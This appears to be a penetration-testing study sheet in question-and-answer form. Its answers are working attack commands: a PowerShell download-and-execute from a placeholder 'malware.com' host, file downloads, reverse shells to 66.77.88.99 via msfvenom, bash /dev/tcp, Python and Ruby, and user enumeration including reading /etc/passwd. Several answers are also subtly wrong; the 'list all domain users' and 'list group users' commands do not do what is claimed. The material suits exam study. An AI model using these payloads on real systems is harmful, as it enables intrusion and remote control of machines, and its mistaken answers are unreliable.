5.2 Tools & code analysis: Exploits and Automation

Question 1

Exploits to Download Files: using the PowerShell, what is the command to download and run a script

Answer 1

powershell.exe -c “IEX((New-Object System.Net.WebClient). DownloadString(‘https://malware.com/badstuff.ps1’))”

Question 2

Exploits to Download Files: using the PowerShell, what is the command to download a file

Answer 2

powershell.exe -c “(New-Object System.Net.WebClient). DownloadFile(“https://malware.com/badstuff.zip”, “C:\Windows\Temp\downloaded.zip”)”

Question 3

Exploits to Download Files: using the Python, what is the code to download a file

Answer 3

import requests url = ‘https://malware.com/badstuff.zip’ r = requests.get(url, allow_redirects=True) open(‘downloaded.zip’, ‘wb’).write(r.content)

Question 4

Exploits for Remote Access: explain how to generate a PowerShell reverse shell using Metasploit

Answer 4

msfvenom -p cmd/windows/reverse_powershell lhost=66.77.88.99 lport=443 > script.ps1

msfvenom: This is the command-line utility within the Metasploit Framework used for generating payloads.

-p cmd/windows/reverse_powershell: This specifies the payload to be generated. In this case, it’s a reverse PowerShell shell payload for Windows. A reverse shell is a type of shell where the target machine initiates the connection back to the attacker’s machine, allowing the attacker to gain control over the target.

lhost=66.77.88.99: This sets the IP address of the listener (the attacker’s machine) to 66.77.88.99. This is the IP address to which the target machine will connect when the reverse shell payload is executed.

lport=443: This sets the port number for the listener to 443. This is the port on the attacker’s machine where the reverse shell connection will be established.

script.ps1: This redirects the output of the msfvenom command to a file named “script.ps1”. The generated PowerShell reverse shell payload will be saved in this file.

Question 5

Exploits for Remote Access: explain how to generate a reverse shell using Bash (Linux Reverse Shell)

Answer 5

bash -i >& /dev/tcp/66.77.88.99/443 0>&1

• “bash -i”: This starts an interactive Bash shell.
• ”>& /dev/tcp/66.77.88.99/443”: This redirects both standard output and standard error to the specified network address and port. In this case, it’s sending the output to IP address 66.77.88.99 on port 443.
• “0>&1”: This redirects the standard input to the standard output, effectively sending the input from the network connection back to the output.

Question 6

Exploits for Remote Access: explain how to generate a reverse shell using Python (Linux Reverse Shell)

Answer 6

export RHOST=“66.77.88.99”;
export RPORT=443;
python -c ‘import socket,os,pty; s=socket.socket(); s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(“/bin/sh”)’

1/ export RHOST=“66.77.88.99”; export RPORT=443;: These two commands set environment variables RHOST and RPORT to the specified IP address and port number. These variables will be used later in the Python command.

2/ python -c ‘import socket,os,pty; s=socket.socket(); s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”)))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(“/bin/sh”)’: This Python one-liner does the following:
- Imports the necessary modules: socket, os, and pty.
- Creates a new socket ‘s’.
- Connects the socket to the IP address and port specified by the environment variables RHOST and RPORT.
- Duplicates the file descriptors (0 for stdin, 1 for stdout, and 2 for stderr) to the socket using os.dup2.
Spawns a shell (/bin/sh) using pty.spawn

Question 7

Exploits for Remote Access: explain how to generate a reverse shell using Ruby (Linux Reverse Shell and Windows Reverse Shell)

Answer 7

o Ruby (Linux Reverse Shell):
ruby -rsocket –e’f=TCPSocket.open(“66.77.88.99”,443).to_i; exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

o Ruby (Windows Reverse Shell)
ruby -rsocket -e ‘c=TCPSocket.new(“66.77.88.99”,“443”); while(cmd=c.gets);IO.popen(cmd,“r”){|io|c.print io.read}end’

Question 8

Exploits for Enumerating Users: explain how to list all users in a domain using PowerShell

Answer 8

Import-Module ActiveDirectory;
Get-ADUser -Identity <username> -properties *</username>

Question 9

Exploits for Enumerating Users: explain how to list all users in a group using PowerShell

Answer 9

Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | select Administrator</username>

Question 10

Exploits for Enumerating Users: explain how to list all users on a system using Bash (2)

Answer 10

cat /etc/passwd

awk –F’:‘ ’{ print $1}’ /etc/passwd

Question 11

Exploits for Enumerating Users: explain how to list all logged users using Bash

Answer 11

who | awk ‘{print $1}’ | sort | uniq | tr ‘\n’ ‘ ’